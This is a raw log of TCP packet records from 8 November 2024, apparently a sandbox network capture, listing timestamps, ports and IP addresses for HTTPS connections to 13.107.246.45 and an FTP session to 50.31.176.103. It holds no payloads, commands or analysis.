Nov 8, 2024 16:15:42.575733900 CET	49827	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:42.575733900 CET	49827	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:42.575759888 CET	443	49827	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:42.575778961 CET	443	49827	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:42.587060928 CET	443	49825	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:42.587217093 CET	443	49825	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:42.587356091 CET	49825	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:42.587357044 CET	49825	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:42.587383986 CET	49825	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:42.587398052 CET	443	49825	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:42.589911938 CET	49829	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:42.589945078 CET	443	49829	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:42.590379953 CET	49829	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:42.590379953 CET	49829	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:42.590411901 CET	443	49829	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:42.664202929 CET	443	49824	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:42.664324045 CET	443	49824	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:42.665122032 CET	49824	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:42.665122032 CET	49824	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:42.665700912 CET	49824	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:42.665715933 CET	443	49824	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:42.667825937 CET	443	49826	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:42.667917967 CET	443	49826	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:42.668128014 CET	49826	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:42.668303013 CET	49826	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:42.668303013 CET	49826	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:42.668311119 CET	443	49826	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:42.668318987 CET	443	49826	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:42.668837070 CET	49830	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:42.668872118 CET	443	49830	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:42.670577049 CET	49831	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:42.670615911 CET	443	49831	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:42.670649052 CET	49830	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:42.670720100 CET	49830	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:42.670726061 CET	49831	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:42.670734882 CET	443	49830	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:42.670828104 CET	49831	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:42.670841932 CET	443	49831	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:42.711040020 CET	443	49827	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:42.711107016 CET	443	49827	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:42.711395025 CET	49827	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:42.711395025 CET	49827	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:42.711431026 CET	49827	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:42.711445093 CET	443	49827	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:42.714394093 CET	49832	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:42.714438915 CET	443	49832	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:42.714819908 CET	49832	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:42.714819908 CET	49832	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:42.714853048 CET	443	49832	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:43.181045055 CET	49785	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:43.181045055 CET	49833	21	192.168.2.10	50.31.176.103
Nov 8, 2024 16:15:43.186002016 CET	21	49833	50.31.176.103	192.168.2.10
Nov 8, 2024 16:15:43.186212063 CET	49833	21	192.168.2.10	50.31.176.103
Nov 8, 2024 16:15:43.186361074 CET	80	49785	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:43.186815023 CET	49785	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:43.285363913 CET	443	49828	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:43.285873890 CET	49828	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:43.285892010 CET	443	49828	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:43.286366940 CET	49828	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:43.286371946 CET	443	49828	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:43.335015059 CET	443	49829	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:43.338745117 CET	49829	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:43.338764906 CET	443	49829	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:43.339413881 CET	49829	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:43.339418888 CET	443	49829	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:43.390616894 CET	443	49830	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:43.391746044 CET	49830	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:43.391746044 CET	49830	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:43.391757965 CET	443	49830	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:43.391773939 CET	443	49830	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:43.403057098 CET	443	49831	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:43.403476000 CET	49831	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:43.403490067 CET	443	49831	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:43.406186104 CET	49831	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:43.406193972 CET	443	49831	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:43.412825108 CET	443	49828	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:43.413733959 CET	443	49828	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:43.413830996 CET	49828	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:43.413885117 CET	49828	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:43.413885117 CET	49828	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:43.413902044 CET	443	49828	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:43.413911104 CET	443	49828	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:43.416666031 CET	49834	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:43.416701078 CET	443	49834	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:43.416809082 CET	49834	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:43.417054892 CET	49834	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:43.417062044 CET	443	49834	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:43.450319052 CET	443	49832	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:43.451045036 CET	49832	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:43.451061010 CET	443	49832	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:43.454330921 CET	49832	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:43.454336882 CET	443	49832	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:43.467508078 CET	443	49829	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:43.467573881 CET	443	49829	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:43.467787981 CET	49829	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:43.467838049 CET	49829	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:43.467838049 CET	49829	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:43.467854023 CET	443	49829	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:43.467863083 CET	443	49829	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:43.470452070 CET	49835	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:43.470493078 CET	443	49835	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:43.470655918 CET	49835	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:43.470815897 CET	49835	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:43.470829010 CET	443	49835	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:43.517272949 CET	443	49830	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:43.517374992 CET	443	49830	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:43.517443895 CET	49830	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:43.517653942 CET	49830	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:43.517672062 CET	443	49830	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:43.517684937 CET	49830	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:43.517690897 CET	443	49830	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:43.520648003 CET	49836	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:43.520693064 CET	443	49836	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:43.520791054 CET	49836	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:43.520935059 CET	49836	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:43.520946980 CET	443	49836	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:43.533206940 CET	443	49831	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:43.533351898 CET	443	49831	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:43.533463955 CET	49831	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:43.533761978 CET	49831	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:43.533781052 CET	443	49831	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:43.533817053 CET	49831	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:43.533823013 CET	443	49831	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:43.536636114 CET	49837	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:43.536684990 CET	443	49837	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:43.536757946 CET	49837	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:43.536887884 CET	49837	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:43.536902905 CET	443	49837	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:43.585880995 CET	443	49832	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:43.585952997 CET	443	49832	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:43.586090088 CET	49832	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:43.591226101 CET	49832	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:43.591244936 CET	443	49832	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:43.591257095 CET	49832	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:43.591267109 CET	443	49832	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:43.594326973 CET	49838	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:43.594373941 CET	443	49838	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:43.594455004 CET	49838	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:43.594647884 CET	49838	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:43.594660997 CET	443	49838	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:43.709301949 CET	21	49833	50.31.176.103	192.168.2.10
Nov 8, 2024 16:15:43.711635113 CET	49833	21	192.168.2.10	50.31.176.103
Nov 8, 2024 16:15:43.716551065 CET	21	49833	50.31.176.103	192.168.2.10
Nov 8, 2024 16:15:43.856692076 CET	21	49833	50.31.176.103	192.168.2.10
Nov 8, 2024 16:15:43.860443115 CET	49833	21	192.168.2.10	50.31.176.103
Nov 8, 2024 16:15:43.865360975 CET	21	49833	50.31.176.103	192.168.2.10
Nov 8, 2024 16:15:44.136200905 CET	21	49833	50.31.176.103	192.168.2.10
Nov 8, 2024 16:15:44.142204046 CET	49833	21	192.168.2.10	50.31.176.103
Nov 8, 2024 16:15:44.145507097 CET	443	49834	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:44.147056103 CET	21	49833	50.31.176.103	192.168.2.10
Nov 8, 2024 16:15:44.150487900 CET	49834	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:44.150506973 CET	443	49834	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:44.154424906 CET	49834	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:44.154429913 CET	443	49834	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:44.211863041 CET	443	49835	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:44.215430975 CET	49835	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:44.215466022 CET	443	49835	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:44.215908051 CET	49835	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:44.215914011 CET	443	49835	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:44.247817993 CET	443	49836	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:44.248651028 CET	49836	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:44.248672009 CET	443	49836	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:44.249125957 CET	49836	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:44.249133110 CET	443	49836	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:44.266535997 CET	443	49837	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:44.287009001 CET	21	49833	50.31.176.103	192.168.2.10
Nov 8, 2024 16:15:44.302723885 CET	49833	21	192.168.2.10	50.31.176.103
Nov 8, 2024 16:15:44.307697058 CET	21	49833	50.31.176.103	192.168.2.10
Nov 8, 2024 16:15:44.308795929 CET	49837	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:44.308823109 CET	443	49837	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:44.309231043 CET	49837	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:44.309237003 CET	443	49837	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:44.343070984 CET	443	49835	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:44.343219995 CET	443	49835	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:44.343277931 CET	443	49835	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:44.343317032 CET	49835	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:44.343347073 CET	49835	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:44.344105959 CET	49835	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:44.344130039 CET	443	49835	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:44.344145060 CET	49835	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:44.344151020 CET	443	49835	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:44.347490072 CET	49839	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:44.347524881 CET	443	49839	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:44.347590923 CET	49839	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:44.348594904 CET	49839	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:44.348611116 CET	443	49839	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:44.352210999 CET	443	49838	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:44.354290009 CET	49838	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:44.354310989 CET	443	49838	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:44.357611895 CET	49838	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:44.357620001 CET	443	49838	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:44.387093067 CET	443	49836	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:44.387164116 CET	443	49836	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:44.387270927 CET	49836	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:44.387399912 CET	443	49834	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:44.387422085 CET	49836	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:44.387438059 CET	443	49836	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:44.387453079 CET	443	49834	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:44.387454987 CET	49836	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:44.387460947 CET	443	49836	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:44.387523890 CET	49834	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:44.389729023 CET	49834	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:44.389751911 CET	443	49834	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:44.389770985 CET	49834	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:44.389777899 CET	443	49834	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:44.400803089 CET	49840	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:44.400841951 CET	443	49840	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:44.401077032 CET	49840	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:44.402374029 CET	49841	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:44.402400017 CET	443	49841	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:44.402456045 CET	49841	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:44.402779102 CET	49840	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:44.402801037 CET	443	49840	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:44.403100967 CET	49841	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:44.403110981 CET	443	49841	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:44.434670925 CET	443	49837	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:44.434700012 CET	443	49837	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:44.434755087 CET	443	49837	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:44.434766054 CET	49837	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:44.434813023 CET	49837	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:44.435349941 CET	49837	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:44.435373068 CET	443	49837	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:44.435384989 CET	49837	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:44.435390949 CET	443	49837	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:44.447961092 CET	21	49833	50.31.176.103	192.168.2.10
Nov 8, 2024 16:15:44.451539993 CET	49833	21	192.168.2.10	50.31.176.103
Nov 8, 2024 16:15:44.456521034 CET	21	49833	50.31.176.103	192.168.2.10
Nov 8, 2024 16:15:44.479789972 CET	49842	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:44.479834080 CET	443	49842	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:44.479918957 CET	49842	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:44.486746073 CET	443	49838	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:44.486814976 CET	443	49838	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:44.486865997 CET	49838	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:44.488890886 CET	49842	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:44.488913059 CET	443	49842	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:44.489819050 CET	49838	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:44.489828110 CET	443	49838	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:44.489857912 CET	49838	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:44.489864111 CET	443	49838	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:44.493102074 CET	49843	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:44.493144035 CET	443	49843	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:44.493211985 CET	49843	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:44.493379116 CET	49843	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:44.493392944 CET	443	49843	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:44.596482992 CET	21	49833	50.31.176.103	192.168.2.10
Nov 8, 2024 16:15:44.596683025 CET	49833	21	192.168.2.10	50.31.176.103
Nov 8, 2024 16:15:44.601588964 CET	21	49833	50.31.176.103	192.168.2.10
Nov 8, 2024 16:15:44.742249012 CET	21	49833	50.31.176.103	192.168.2.10
Nov 8, 2024 16:15:44.742933989 CET	49844	33933	192.168.2.10	50.31.176.103
Nov 8, 2024 16:15:44.747922897 CET	33933	49844	50.31.176.103	192.168.2.10
Nov 8, 2024 16:15:44.748234034 CET	49844	33933	192.168.2.10	50.31.176.103
Nov 8, 2024 16:15:44.748291969 CET	49833	21	192.168.2.10	50.31.176.103
Nov 8, 2024 16:15:44.753256083 CET	21	49833	50.31.176.103	192.168.2.10
Nov 8, 2024 16:15:45.090704918 CET	443	49839	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:45.091150999 CET	49839	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:45.091188908 CET	443	49839	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:45.091592073 CET	49839	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:45.091599941 CET	443	49839	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:45.147641897 CET	443	49840	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:45.148164988 CET	49840	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:45.148195982 CET	443	49840	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:45.148633003 CET	49840	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:45.148643970 CET	443	49840	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:45.154038906 CET	443	49841	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:45.154393911 CET	49841	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:45.154419899 CET	443	49841	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:45.154839039 CET	49841	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:45.154844999 CET	443	49841	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:45.221348047 CET	443	49839	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:45.221541882 CET	443	49839	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:45.221597910 CET	49839	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:45.221714973 CET	49839	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:45.221738100 CET	443	49839	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:45.221751928 CET	49839	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:45.221759081 CET	443	49839	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:45.222300053 CET	443	49843	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:45.222750902 CET	49843	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:45.222764969 CET	443	49843	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:45.223215103 CET	49843	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:45.223218918 CET	443	49843	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:45.224697113 CET	49845	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:45.224734068 CET	443	49845	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:45.224811077 CET	49845	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:45.224963903 CET	49845	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:45.224975109 CET	443	49845	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:45.225095034 CET	443	49842	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:45.225399017 CET	49842	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:45.225418091 CET	443	49842	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:45.225811005 CET	49842	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:45.225816965 CET	443	49842	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:45.274976015 CET	21	49833	50.31.176.103	192.168.2.10
Nov 8, 2024 16:15:45.275302887 CET	49844	33933	192.168.2.10	50.31.176.103
Nov 8, 2024 16:15:45.275343895 CET	49844	33933	192.168.2.10	50.31.176.103
Nov 8, 2024 16:15:45.278497934 CET	443	49840	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:45.278546095 CET	443	49840	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:45.278594017 CET	443	49840	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:45.278604984 CET	49840	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:45.278644085 CET	49840	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:45.278829098 CET	49840	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:45.278844118 CET	443	49840	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:45.278853893 CET	49840	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:45.278858900 CET	443	49840	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:45.280632019 CET	33933	49844	50.31.176.103	192.168.2.10
Nov 8, 2024 16:15:45.280967951 CET	33933	49844	50.31.176.103	192.168.2.10
Nov 8, 2024 16:15:45.281030893 CET	49844	33933	192.168.2.10	50.31.176.103
Nov 8, 2024 16:15:45.281593084 CET	49846	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:45.281629086 CET	443	49846	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:45.281697989 CET	49846	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:45.281841993 CET	49846	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:45.281855106 CET	443	49846	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:45.296993017 CET	443	49841	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:45.297065020 CET	443	49841	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:45.297132015 CET	49841	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:45.297252893 CET	49841	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:45.297264099 CET	443	49841	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:45.297278881 CET	49841	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:45.297283888 CET	443	49841	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:45.299849033 CET	49847	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:45.299884081 CET	443	49847	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:45.299963951 CET	49847	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:45.300070047 CET	49847	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:45.300081968 CET	443	49847	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:45.330073118 CET	49833	21	192.168.2.10	50.31.176.103
Nov 8, 2024 16:15:45.351891994 CET	443	49843	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:45.352227926 CET	443	49843	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:45.352291107 CET	49843	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:45.352360964 CET	49843	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:45.352372885 CET	443	49843	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:45.352380991 CET	49843	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:45.352385998 CET	443	49843	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:45.354973078 CET	49848	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:45.355005026 CET	443	49848	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:45.355089903 CET	49848	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:45.355225086 CET	49848	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:45.355238914 CET	443	49848	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:45.358818054 CET	443	49842	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:45.358874083 CET	443	49842	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:45.358931065 CET	49842	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:45.359021902 CET	49842	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:45.359034061 CET	443	49842	13.107.246.45	192.168.2.10
